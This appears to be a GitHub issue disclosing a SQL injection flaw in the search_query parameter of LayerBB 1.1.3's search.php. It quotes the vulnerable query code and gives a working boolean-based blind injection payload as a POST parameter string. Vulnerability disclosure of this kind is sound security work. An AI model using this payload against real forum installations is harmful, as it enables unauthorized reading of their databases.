Skip to content

SQL injection vulnerability #51

Open
@yaoyao6688

Description

@yaoyao6688

LayerBB 1.1.3 has SQL Injection via the search.php search_query parameter.

Steps to Reproduce Issue

in search.php 86-91
if ((isset($_POST['user_search']) && isset($_POST['search_type'])) || !isset($_POST['search_type'])) { $MYSQL->bind('search_query', $search_query); $query = $MYSQL->query("SELECT * FROM {prefix}users WHERE username LIKE CONCAT('%',:search_query,'%');");
Unfiltered search_query results in SQL injection
POC
Packet parameters
search_query=admin' RLIKE (SELECT (CASE WHEN (5268=5268) THEN 0x61646d696e ELSE 0x28 END)) AND 'GdPB'='GdPB&time_from=1996&time_to=2019&user_search=on&search_type=advanced&search_submit=Search

Server Environment (PHP, MySQL, Apache Version and Operating System):
version 1.1.3

Metadata

Metadata

Assignees

Labels

Projects

No projects

Relationships

None yet

Development

No branches or pull requests

Issue actions